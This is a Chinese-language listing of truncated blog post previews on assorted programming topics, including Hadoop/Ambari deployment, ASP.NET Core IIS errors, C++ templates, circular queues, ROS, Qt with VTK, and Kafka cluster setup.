目录 Part.01 关于HDP Part.02 核心组件原理 Part.03 资源规划 Part.04 基础环境配置 Part.05 Yum源配置 Part.06 安装OracleJDK Part.07 安装MySQL Part.08 部署Ambari集群 Part.09 安装OpenLDAP Part.10 创建集群 Part.11 安装Kerberos Part.12 安装HDFS Part.13 安装Ranger …

ASP.NET Core 使用IIS调试出现505.24错误

最近一直再学习asp.net 相关的东西&#xff0c;主要是为前端app提供一个webapi接口。在使用iis调试程序时出现HTTP Error 500.24 - Internal Server Error错误&#xff0c;搞了好久才最终解决。 1.在项目中增加web.config配置文件 2.将配置文件改为如下内容 <?xml version…

C++模版

文章目录 C模版1、泛型编程2、函数模版2.1、函数模版概念2.2、函数模版格式2.3、函数模版原理2.4、函数模版的实例化2.5、模板参数的匹配原则 3、类模版3.1、类模版概念3.2、类模版格式3.3、类模板的实例化 C模版 1、泛型编程 泛型编程&#xff08;Generic Programming&#x…

003、应用程序框架-UIAbility

之——UIAbility 目录 之——UIAbility 杂谈 正文 1.UIAbility 2.基本使用 2.1 创建Ability工程 2.2 添加基础功能 2.3 新建页面 2.4 页面间的跳转 3.生命周期 总结 杂谈 UIAbility&#xff0c;其中的页面创建、页面间的跳转、数据传递、生命周期。 正文 1.UIAbil…

【数据结构】环形队列

环形队列 1. 定义 环形队列就是将队列在逻辑上看作环形结构、物理上仍是数组形式存储的一种数据结构。 其实现主要分为两种情况&#xff1a; 浪费空间法记录空间法 2. 实现 实现要考虑的是成员变量 2.1 记录空间法 使用used标识当前存储了多少元素&#xff0c;如果为空&a…

基于ASP.NET MVC技术的图书管理系统的设计与实现

基于ASP.NET MVC技术的图书管理系统的设计与实现 摘要&#xff1a;图书管理系统是一套高新科学技术和图书知识信息以及传统历史文化完美结合的体现。它改变了传统图书收藏的静态书本式图书服务特征&#xff0c;实现了多媒体存取、远程网络传输、智能化检索、跨库无缝链接、创造…

type-c充电器输出电压5V9V12V15V20V PD协议诱骗快充应用方案

Type-C接口的PD充电器&#xff08;如iPhone的20W充电器&#xff09;默认是没有电压输出的&#xff0c;想要让Type-C的充电器输出5V、9V、12V、15V、20V&#xff0c;只需要在产品上使用一颗快充取电芯片XSP08即可。 工作原理&#xff1a; 各类小家电产品如平板电脑、智能穿戴产…

什么是Ros(二)- 结构和通讯概述

目录 1.架构 2.通讯 参考文献 上接&#xff1a;什么是Ros&#xff08;一&#xff09;-CSDN博客 1.架构 共三层&#xff1a;OS 层&#xff0c;中间层&#xff0c;应用层。 OS 层&#xff1a;OS 层是操作系统层也就是我们现在使用的ubuntu&#xff08;linux&#xff09;&…

win10下在Qt中使用VTK(安装VS2017+安装QT5.9.9+编译配置VTK8.2.0)

目录 前言一、安装Visual Studio20171&#xff09;官网下载可执行的安装程序2&#xff09;安装3&#xff09;启动 二、安装Qt 5.9.91&#xff09;下载可执行的安装程序2&#xff09;安装3&#xff09;配置环境变量 三、安装Cmake1&#xff09;下载可执行的安装程序2&#xff09…

【深度优先】LeetCode1932:合并多棵二叉搜索树

作者推荐 动态规划LeetCode2552&#xff1a;优化了6版的1324模式 题目 给你 n 个 二叉搜索树的根节点 &#xff0c;存储在数组 trees 中&#xff08;下标从 0 开始&#xff09;&#xff0c;对应 n 棵不同的二叉搜索树。trees 中的每棵二叉搜索树 最多有 3 个节点 &#xff0…

一种excel多线程并发写sheet的方案

一、背景 有一次项目的需求要求导出excel&#xff0c;并且将不同的数据分别写到不同的sheet中。 二、 方案概述 首先一开始使用easyexcel去导出excel&#xff0c;结果发现导出时间需要3秒左右。于是想着能不能缩短excel导出时间&#xff0c;于是第一次尝试使用异步线程去查询数…

人工智能原理复习--确定性推理

文章目录 上一篇推理概述自然演绎推理合适公式 归结演绎推理归结原理归结反演 提升归结效率下一篇 上一篇 人工智能原理复习–知识表示&#xff08;二&#xff09; 推理概述 推理就是按某种策略由已知判断推出另一判断的思维过程 分类&#xff1a; 演绎推理、归纳推理、默…

kafka 集群 ZooKeeper 模式搭建

Apache Kafka是一个开源分布式事件流平台&#xff0c;被数千家公司用于高性能数据管道、流分析、数据集成和关键任务应用程序 Kafka 官网&#xff1a;Apache Kafka 关于ZooKeeper的弃用 根据 Kafka官网信息&#xff0c;随着Apache Kafka 3.5版本的发布&#xff0c;Zookeeper现…